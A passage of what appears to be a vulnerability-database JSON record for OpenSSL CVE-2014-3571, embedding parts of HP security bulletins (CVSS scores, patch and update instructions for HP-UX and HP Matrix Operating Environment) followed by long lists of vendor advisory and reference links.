(AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6\nCVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\nCVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\nCVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9\nCVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9\nCVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\nCVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\nCVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9\nCVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has made the following software updates available to resolve the\nvulnerabilities in the impacted versions of HP Matrix Operating Environment\n\nHP Matrix Operating Environment 7.5.0 is only available on DVD. Please order\nthe latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO\nfrom the following location:\n\nhttp://www.hp.com/go/insightupdates\n\nChoose the orange Select button. This presents the HP Insight Management\nMedia order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from\nthe Software specification list. Fill out the rest of the form and submit it. \n\nHP has addressed these vulnerabilities for the affected software components\nbundled with the HP Matrix Operating Environment in the following HP Security\nBulletins. \n\nHP Matrix Operating Environment component\n HP Security Bulletin Number\n Security Bulletin Location\n\nHP Systems Insight Manager (SIM)\n HPSBMU03394\n HPSBMU03394\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744\n\nHP System Management Homepage (SMH)\n HPSBMU03380\n http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490\u0026la\nng=en-us\u0026cc=\n\nHP Version Control Agent (VCA)\n HPSBMU03397\n https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169\n\nHP Version Control Repository Manager (VCRM)\n HPSBMU03396\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\n_na-c04765115\n\nHP Virtual Connect Enterprise Manager (VCEM) SDK\n HPSBMU03413\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\n_na-c04774021\n\nHISTORY\nVersion:1 (rev.1) - 24 August 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (GNU/Linux)\n\niEYEARECAAYFAlXbREoACgkQ4B86/C0qfVl2EQCcC7+X+ufWAfXznICabd38dIqX\n/uwAmwTKaw3ON48Dwm7wtl1Cw1+vwZGJ\n=kie8\n-----END PGP SIGNATURE-----\n. \n\nReferences:\n\nCVE-2014-8275 Cryptographic Issues (CWE-310)\nCVE-2014-3569 Remote Denial of Service (DoS)\nCVE-2014-3570 Cryptographic Issues (CWE-310)\nCVE-2014-3571 Remote Denial of Service (DoS)\nCVE-2014-3572 Cryptographic Issues (CWE-310)\nCVE-2015-0204 Cryptographic Issues (CWE-310)\nSSRT101885\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The\nupdates are available from either of the following sites:\n\nftp://sl098ze:Secure12@h2.usa.hp.com\n\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\n=OPENSSL11I\n\nHP-UX Release\n HP-UX OpenSSL depot name\n\nB.11.11 (11i v1)\n OpenSSL_A.00.09.08ze.001_HP-UX_B.11.11_32_64.depot\n\nB.11.23 (11i v2)\n OpenSSL_A.00.09.08ze.002_HP-UX_B.11.23_IA-PA.depot\n\nB.11.31 (11i v3)\n OpenSSL_A.00.09.08ze.003_HP-UX_B.11.31_IA-PA.depot\n\nMANUAL ACTIONS: Yes - Update\n\nInstall OpenSSL A.00.09.08ze or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant", "sources": [ { "db": "NVD", "id": "CVE-2014-3571" }, { "db": "JVNDB", "id": "JVNDB-2014-007552" }, { "db": "BID", "id": "71937" }, { "db": "VULMON", "id": "CVE-2014-3571" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "129880" }, { "db": "PACKETSTORM", "id": "131359" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129893" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130548" }, { "db": "PACKETSTORM", "id": "130545" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-3571", "trust": 3.1 }, { "db": "BID", "id": "71937", "trust": 1.4 }, { "db": "MCAFEE", "id": "SB10102", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10108", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033378", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU91828320", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU98974537", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-007552", "trust": 0.8 }, { "db": "VULMON", "id": "CVE-2014-3571", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133317", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129880", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131359", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130987", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129893", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133325", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132763", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130548", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130545", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3571" }, { "db": "BID", "id": "71937" }, { "db": "JVNDB", "id": "JVNDB-2014-007552" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "129880" }, { "db": "PACKETSTORM", "id": "131359" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129893" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130548" }, { "db": "PACKETSTORM", "id": "130545" }, { "db": "NVD", "id": "CVE-2014-3571" } ] }, "id": "VAR-201501-0435", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.39692771499999996 }, "last_update_date": "2024-06-17T10:09:08.262000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2015/apr/msg00001.html" }, { "title": "HT204659", "trust": 0.8, "url": "http://support.apple.com/en-us/ht204659" }, { "title": "HT204659", "trust": 0.8, "url": "http://support.apple.com/ja-jp/ht204659" }, { "title": "cisco-sa-20150310-ssl", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150310-ssl" }, { "title": "Fix crash in dtls1_get_record whilst in the listen state where you get two separate reads performed", "trust": 0.8, "url": "https://github.com/openssl/openssl/commit/feba02f3919495e1b960c33ba849e10e77d0785d" }, { "title": "Follow on from CVE-2014-3571. This fixes the code that was the original source of the crash due to p being NULL.", "trust": 0.8, "url": "https://github.com/openssl/openssl/commit/248385c606620b29ecc96ca9d3603463f879652b" }, { "title": "HPSBUX03244 SSRT101885", "trust": 0.8, "url": "http://h20565.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04556853\u0026lang=en\u0026cc=us" }, { "title": "HPSBHF03289", "trust": 0.8, "url": "http://marc.info/?l=bugtraq\u0026m=142721102728110\u0026w=2" }, { "title": "NV15-017", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv15-017.html" }, { "title": "DTLS segmentation fault in dtls1_get_record (CVE-2014-3571)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv_20150108.txt" }, { "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015verbose-2367947.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "title": "Text Form of Oracle Critical Patch Update - October 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016verbose-2881725.html" }, { "title": "Oracle Critical Patch Update Advisory - April 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "title": "Text Form of Oracle Critical Patch Update - October 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015verbose-2367954.html" }, { "title": "Text Form of Oracle Critical Patch Update - April 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015verbose-2365613.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "title": "Oracle Third Party Bulletin - January 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "title": "RHSA-2015:0066", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0066.html" }, { "title": "July 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update" }, { "title": "July 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2015_critical_patch_update" }, { "title": "October 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/october_2016_critical_patch_update" }, { "title": "October 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/october_2015_critical_patch_update" }, { "title": "April 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/april_2015_critical_patch_update" }, { "title": "cisco-sa-20150310-ssl", "trust": 0.8, "url": "http://www.cisco.com/cisco/web/support/jp/112/1128/1128755_cisco-sa-20150310-ssl-j.html" }, { "title": "TLSA-2015-2", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2015/tlsa-2015-2j.html" }, { "title": "\u682a\u5f0f\u4f1a\u793e\u30d0\u30c3\u30d5\u30a1\u30ed\u30fc \u306e\u544a\u77e5\u30da\u30fc\u30b8", "trust": 0.8, "url": "http://buffalo.jp/support_s/s20150327b.html" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20150066 - security advisory" }, { "title": "Red Hat: CVE-2014-3571", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-3571" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2459-1" }, { "title": "Debian Security Advisories: DSA-3125-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=a3210fee56d96657bbff4ad44c3d0807" }, { "title": "Tenable Security Advisories: [R7] OpenSSL \u002720150108\u0027 Advisory Affects Tenable Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2015-03" }, { "title": "Amazon Linux AMI: ALAS-2015-469", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-469" }, { "title": "Symantec Security Advisories: SA88 : OpenSSL Security Advisory 08-Jan-2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=9281dc3b1a760e1cf2711cdf82cf64d7" }, { "title": "Apple: OS X Yosemite v10.10.3 and Security Update 2015-004", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=aa5ab46566482c02434bb8cf65c9614e" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL (January 2015) Affecting Cisco Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20150310-ssl" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4b527561ba1a5de7a529c8a93679f585" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=744c19dc9f4f70ad58059bf8733ec9c1" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eaf98750f1130c39e83765575c69e165" }, { "title": "Splunk Security Announcements: Splunk response to January 2015 OpenSSL vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=21b119528a2fb8c78850a17027b71424" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=459961024c4bdce7bb3a1a40a65a6f2e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2015/01/09/dead_openssl_bugs_more_fleas_than_poodles/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3571" }, { "db": "JVNDB", "id": "JVNDB-2014-007552" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-Other", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-007552" }, { "db": "NVD", "id": "CVE-2014-3571" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.4, "url": "https://www.openssl.org/news/secadv_20150108.txt" }, { "trust": 1.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150310-ssl" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/71937" }, { "trust": 1.1, "url": "https://github.com/openssl/openssl/commit/248385c606620b29ecc96ca9d3603463f879652b" }, { "trust": 1.1, "url": "https://github.com/openssl/openssl/commit/feba02f3919495e1b960c33ba849e10e77d0785d" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-january/147938.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-january/148363.html" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:019" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3125" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142496289803847\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00021.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0066.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142721102728110\u0026w=2" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/apr/msg00001.html" }, { "trust": 1.1, "url": "https://support.apple.com/ht204659" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00026.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050297101809\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050254401665\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143748090628601\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050155601375\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142895206924048\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050205101530\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142496179803395\u0026w=2" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "trust": 1.1, "url": "https://bto.bluecoat.com/security-advisory/sa88" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033378" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10108" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10102" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3571" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu91828320/index.html" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu98974537/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3571" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.6, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.6, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206" }, { "trust": 0.4, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765169" }, { "trust": 0.4, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.3, "url": "http://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2015-01-30.pdf" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://www.splunk.com/view/sp-caaanu5#affectedproductsandcomponents" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699883" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699667" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/feb/160" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04746490" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04602055" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765115" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774019" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774021" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698818" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883857" }, { "trust": 0.3, "url": "https://aix.software.ibm.com/aix/efixes/security/openssl_advisory12.asc" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101008182" }, { "trust": 0.3, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "https://www.alienvault.com/forums/discussion/4475/security-advisory-alienvault-v4-15-1-addresses-twenty-20-vulnerabilities" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098593" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903299" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005159" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700275" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699938" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097503" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883287" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097811" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902694" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903726" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097796" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009328" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21695985" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022074" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701453" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21694849" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097360" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698506" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699069" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0118" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0226" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523" }, { "trust": 0.3, "url": 